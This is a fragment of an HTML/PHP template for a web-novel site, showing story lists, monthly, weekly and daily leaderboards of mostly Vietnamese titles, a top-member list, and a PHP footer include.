                            <p class="genres"><a href="/">Chapter 495 Peaceful Sloth!? Having brain strokes without brain!</a></p>
                        </div>
                    </li>
                    <li class="story_list_thumb">
                        <a href="/" class="cover" title="Manipulative Harem God"><img itemprop="image" data-layzr="https://1stkissnovel.org/wp-content/uploads/2024/01/max-level-learning-ability-facing-the-cliff-and-repenting-for-80-years-193x278.jpg" alt="Manipulative Harem God" width="140" height="187" src="https://1stkissnovel.org/wp-content/uploads/2024/01/max-level-learning-ability-facing-the-cliff-and-repenting-for-80-years-193x278.jpg"></a>
                        <div class="info"><h3 class="story-title"><a href="/" itemprop="url" title="Manipulative Harem God">Manipulative Harem God</a></h3>
                            <span class="author"><a href="" class="text-danger"><i class="fas fa-trash-alt"></i> Delete</a></span>
                            <p class="genres"><a href="/">Chapter 495 Peaceful Sloth!? Having brain strokes without brain!</a></p>
                        </div>
                    </li>
                    <li class="story_list_thumb">
                        <a href="/" class="cover" title="Manipulative Harem God"><img itemprop="image" data-layzr="https://1stkissnovel.org/wp-content/uploads/2024/01/max-level-learning-ability-facing-the-cliff-and-repenting-for-80-years-193x278.jpg" alt="Manipulative Harem God" width="140" height="187" src="https://1stkissnovel.org/wp-content/uploads/2024/01/max-level-learning-ability-facing-the-cliff-and-repenting-for-80-years-193x278.jpg"></a>
                        <div class="info"><h3 class="story-title"><a href="/" itemprop="url" title="Manipulative Harem God">Manipulative Harem God</a></h3>
                            <span class="author"><a href="" class="text-danger"><i class="fas fa-trash-alt"></i> Delete</a></span>
                            <p class="genres"><a href="/">Chapter 495 Peaceful Sloth!? Having brain strokes without brain!</a></p>
                        </div>
                    </li>


                </ul>

                <div class="leader-board-100">
                    <div class="leader-board-tabs">
                        <a href="#top-donate" rel="nofollow" class="active">Top month</small></a>
                        <a href="#top-pineal" rel="nofollow">Top week</a>
                        <a href="#top-voted" rel="nofollow">Top day</a>
                    </div>
                    <ul class="ranked-stories" id="top-donate">
                        <li><label class="rk-1"><small>1</small></label>
                            <div class="info"><h4><a href="/" title="Manipulative Harem God">Manipulative Harem God</a></h4>
                                <span><strong>4,000</strong></span>
                                <p class="author"><i class="fas fa-feather-alt"></i> Chapter 495 Peaceful Sloth!? Having brain strokes without brain!</p>
                            </div>
                            <div class="book-cover"><a href="/" title="Chi&#7871;m L&#7845;y Em"><img itemprop="image" data-layzr="https://1stkissnovel.org/wp-content/uploads/2023/10/manipulative-harem-god-175x238.jpg" alt="Chi&#7871;m L&#7845;y Em" width="140" height="187" src="https://1stkissnovel.org/wp-content/uploads/2023/10/manipulative-harem-god-175x238.jpg"></a></div>
                        </li>
                        <li><label class="rk-2"><small>2</small></label><h4><a href="/" title="Manipulative Harem God">Manipulative Harem God </a></h4><span>3,030</span></li>
                        <li><label class="rk-3"><small>3</small></label><h4><a href="/" title="Manipulative Harem God">Manipulative Harem God</a></h4><span>3,010</span></li>
                        <li><label class="rk-4"><small>4</small></label><h4><a href="/" title="Manipulative Harem God">Manipulative Harem God</a></h4><span>3,000</span></li>
                        <li><label class="rk-4"><small>4</small></label><h4><a href="/" title="Manipulative Harem God">Manipulative Harem God</a></h4><span>3,000</span></li>
                        <li><label class="rk-6"><small>6</small></label><h4><a href="/" title="Manipulative Harem God">Manipulative Harem God</a></h4><span>2,900</span></li>
                        <li><label class="rk-7"><small>7</small></label><h4><a href="/" title="Manipulative Harem God">Manipulative Harem God</a></h4><span>2,100</span></li>
                        <li><label class="rk-8"><small>8</small></label><h4><a href="/" title="Manipulative Harem God">Manipulative Harem God</a></h4><span>2,090</span></li>
                        <li><label class="rk-9"><small>9</small></label><h4><a href="/" title="Manipulative Harem God">Manipulative Harem God</a></h4><span>2,080</span></li>
                        <li><label class="rk-10"><small>10</small></label><h4><a href="/" title="Manipulative Harem God">Manipulative Harem God</a></h4><span>1,550</span></li>
                    </ul>
                    <ul class="ranked-stories" id="top-pineal">
                        <li><label class="rk-1"><small>1</small></label>
                            <div class="info"><h4><a href="tam-can-bao-boi-cua-ton-phi.html" title="T&acirc;m Can B&#7843;o B&#7889;i C&#7911;a T&ocirc;n Ph&#7881;">T&acirc;m Can B&#7843;o B&#7889;i C&#7911;a T&ocirc;n Ph&#7881;</a></h4>
                                <span><strong>2,909</strong></span>
                                <p class="author"><i class="fas fa-feather-alt"></i> Nh&#432;&#7907;c V&#361;</p>
                            </div>
                            <div class="book-cover"><a href="tam-can-bao-boi-cua-ton-phi.html" title="T&acirc;m Can B&#7843;o B&#7889;i C&#7911;a T&ocirc;n Ph&#7881;"><img itemprop="image" data-layzr="https://cdn.enovel.mobi/covers/37/37306-tam-can-bao-boi-cua-ton-phi-140x187.webp" alt="T&acirc;m Can B&#7843;o B&#7889;i C&#7911;a T&ocirc;n Ph&#7881;" width="140" height="187" src="images/https:-enovel.mobi"></a></div>
                        </li>
                        <li><label class="rk-2"><small>2</small></label><h4><a href="chu-oi-em-muon.html" title="Ch&uacute; &#416;i Em Mu&#7889;n">Ch&uacute; &#416;i Em Mu&#7889;n</a></h4><span>2,117</span></li>
                        <li><label class="rk-3"><small>3</small></label><h4><a href="hop-dong-tra-thu-ngot-ngao.html" title="H&#7907;p &#272;&#7891;ng Tr&#7843; Th&ugrave; Ng&#7885;t Ng&agrave;o">H&#7907;p &#272;&#7891;ng Tr&#7843; Th&ugrave; Ng&#7885;t Ng&agrave;o</a></h4><span>501</span></li>
                        <li><label class="rk-4"><small>4</small></label><h4><a href="cam-duc.html" title="C&#7845;m D&#7909;c">C&#7845;m D&#7909;c</a></h4><span>423</span></li>
                        <li><label class="rk-5"><small>5</small></label><h4><a href="nguoi-tinh-trong-mong.html" title="Ng&#432;&#7901;i T&igrave;nh Trong M&#7897;ng">Ng&#432;&#7901;i T&igrave;nh Trong M&#7897;ng</a></h4><span>400</span></li>
                        <li><label class="rk-6"><small>6</small></label><h4><a href="muc-nhiet-nong-bong.html" title="M&#7913;c Nhi&#7879;t N&oacute;ng B&#7887;ng">M&#7913;c Nhi&#7879;t N&oacute;ng B&#7887;ng</a></h4><span>317</span></li>
                        <li><label class="rk-7"><small>7</small></label><h4><a href="chang-the-tim-duoc-em.html" title="Ch&#7859;ng Th&#7875; T&igrave;m &#272;&#432;&#7907;c Em">Ch&#7859;ng Th&#7875; T&igrave;m &#272;&#432;&#7907;c Em</a></h4><span>278</span></li>
                        <li><label class="rk-8"><small>8</small></label><h4><a href="vet-xuoc.html" title="V&#7871;t X&#432;&#7899;c">V&#7871;t X&#432;&#7899;c</a></h4><span>274</span></li>
                        <li><label class="rk-9"><small>9</small></label><h4><a href="vat-nho-me-nguoi-cua-nham-thieu.html" title="V&#7853;t Nh&#7887; M&ecirc; Ng&#432;&#7901;i C&#7911;a Nh&#7853;m Thi&#7871;u">V&#7853;t Nh&#7887; M&ecirc; Ng&#432;&#7901;i C&#7911;a Nh&#7853;m Thi&#7871;u</a></h4><span>250</span></li>
                        <li><label class="rk-10"><small>10</small></label><h4><a href="trot-yeu.html" title="Tr&oacute;t Y&ecirc;u">Tr&oacute;t Y&ecirc;u</a></h4><span>234</span></li>
                    </ul>
                    <ul class="ranked-stories" id="top-voted">
                        <li><label class="rk-1"><small>1</small></label>
                            <div class="info"><h4><a href="chang-the-tim-duoc-em.html" title="Ch&#7859;ng Th&#7875; T&igrave;m &#272;&#432;&#7907;c Em">Ch&#7859;ng Th&#7875; T&igrave;m &#272;&#432;&#7907;c Em</a></h4>
                                <span><strong>144</strong></span>
                                <p class="author"><i class="fas fa-feather-alt"></i> Ti&#7875;u S&#417;n Tr&agrave;</p>
                            </div>
                            <div class="book-cover"><a href="chang-the-tim-duoc-em.html" title="Ch&#7859;ng Th&#7875; T&igrave;m &#272;&#432;&#7907;c Em"><img itemprop="image" data-layzr="https://cdn.enovel.mobi/covers/36/36827-chang-the-tim-duoc-em-140x187.webp?v=2" alt="Ch&#7859;ng Th&#7875; T&igrave;m &#272;&#432;&#7907;c Em" width="140" height="187" src="images/https:-enovel.mobi"></a></div>
                        </li>
                        <li><label class="rk-2"><small>2</small></label><h4><a href="me-luyen-sac-tinh.html" title="M&ecirc; Luy&#7871;n S&#7855;c T&igrave;nh">M&ecirc; Luy&#7871;n S&#7855;c T&igrave;nh</a></h4><span>101</span></li>
                        <li><label class="rk-3"><small>3</small></label><h4><a href="sa-vao-nguy-hiem.html" title="Sa V&agrave;o Nguy Hi&#7875;m">Sa V&agrave;o Nguy Hi&#7875;m</a></h4><span>98</span></li>
                        <li><label class="rk-4"><small>4</small></label><h4><a href="chiem-lay-em.html" title="Chi&#7871;m L&#7845;y Em">Chi&#7871;m L&#7845;y Em</a></h4><span>88</span></li>
                        <li><label class="rk-5"><small>5</small></label><h4><a href="tinh-khong-the-cuong.html" title="T&igrave;nh Kh&ocirc;ng Th&#7875; C&#432;&#7905;ng">T&igrave;nh Kh&ocirc;ng Th&#7875; C&#432;&#7905;ng</a></h4><span>85</span></li>
                        <li><label class="rk-6"><small>6</small></label><h4><a href="cuoi-nham-chong-hu.html" title="C&#432;&#7899;i Nh&#7847;m Ch&#7891;ng H&#432;">C&#432;&#7899;i Nh&#7847;m Ch&#7891;ng H&#432;</a></h4><span>83</span></li>
                        <li><label class="rk-7"><small>7</small></label><h4><a href="bao-boi-trong-long-lao-dai.html" title="B&#7843;o B&#7889;i Trong L&ograve;ng L&atilde;o &#272;&#7841;i">B&#7843;o B&#7889;i Trong L&ograve;ng L&atilde;o &#272;&#7841;i</a></h4><span>81</span></li>
                        <li><label class="rk-8"><small>8</small></label><h4><a href="nguc-tu-tinh-yeu.html" title="Ng&#7909;c T&ugrave; T&igrave;nh Y&ecirc;u">Ng&#7909;c T&ugrave; T&igrave;nh Y&ecirc;u</a></h4><span>73</span></li>
                        <li><label class="rk-9"><small>9</small></label><h4><a href="cam-duc.html" title="C&#7845;m D&#7909;c">C&#7845;m D&#7909;c</a></h4><span>68</span></li>
                        <li><label class="rk-10"><small>10</small></label><h4><a href="vo-yeu-cua-vuong-tong.html" title="V&#7907; Y&ecirc;u C&#7911;a V&#432;&#417;ng T&#7893;ng">V&#7907; Y&ecirc;u C&#7911;a V&#432;&#417;ng T&#7893;ng</a></h4><span>52</span></li>
                    </ul>
                </div>

                <div class="leader-board-100 mt-4">
                    <h2>Top member</h2>
                    <ul class="ranked-readers">

                        <li><div><div class="avatar avatar-border "><img data-layzr="https://likemanga.io/upload/user/2023/11/1701145197-65656a6d8694c-ddydtdxyjtdxfyudsrxffyutyukv.png" alt="" width="36" height="36" src="https://likemanga.io/upload/user/2023/11/1701145197-65656a6d8694c-ddydtdxyjtdxfyudsrxffyutyukv.png"></div>
                                <h5>Nguyen An<small>Level 100 <i class="fas fa-crown text-warning"></i></small></h5></div>
                            <label class="rk-1"><small>1</small></label>
                        </li>

                        <li><div><div class="avatar avatar-border g_female"><img data-layzr="https://likemanga.io/upload/user/2023/11/1701145197-65656a6d8694c-ddydtdxyjtdxfyudsrxffyutyukv.png" alt="" width="36" height="36" src="https://likemanga.io/upload/user/2023/11/1701145197-65656a6d8694c-ddydtdxyjtdxfyudsrxffyutyukv.png"></div>
                                <h5>quynhkun<small>Level 99 <i class="fas fa-crown text-warning"></i></small></h5></div>
                            <label class="rk-2"><small>2</small></label></li>
                        <li><div><div class="avatar avatar-border "><img data-layzr="https://likemanga.io/upload/user/2023/11/1701145197-65656a6d8694c-ddydtdxyjtdxfyudsrxffyutyukv.png" alt="" width="36" height="36" src="https://likemanga.io/upload/user/2023/11/1701145197-65656a6d8694c-ddydtdxyjtdxfyudsrxffyutyukv.png"></div>
                                <h5>Thanh Truc<small>Level 98 <i class="fas fa-crown text-warning"></i></small></h5></div>
                            <label class="rk-3"><small>3</small></label></li>
                        <li><div><div class="avatar avatar-border "><img data-layzr="https://likemanga.io/upload/user/2023/11/1701145197-65656a6d8694c-ddydtdxyjtdxfyudsrxffyutyukv.png" alt="" width="36" height="36" src="https://likemanga.io/upload/user/2023/11/1701145197-65656a6d8694c-ddydtdxyjtdxfyudsrxffyutyukv.png"></div>
                                <h5>phamemily97<small>Level 97</small></h5></div>
                            <label class="rk-4"><small>4</small></label></li>
                        <li><div><div class="avatar avatar-border "><img data-layzr="https://likemanga.io/upload/user/2023/11/1701145197-65656a6d8694c-ddydtdxyjtdxfyudsrxffyutyukv.png" alt="" width="36" height="36" src="https://likemanga.io/upload/user/2023/11/1701145197-65656a6d8694c-ddydtdxyjtdxfyudsrxffyutyukv.png"></div>
                                <h5>thaongn1.8<small>Level 96</small></h5></div>
                            <label class="rk-5"><small>5</small></label></li>


                    </ul>
                </div>

            </div>
        </section>


    </div></main>
<?php
include 'layout/'.$INFO['path_skin'].'/footer.php';
?>

ZeroDay Forums Mini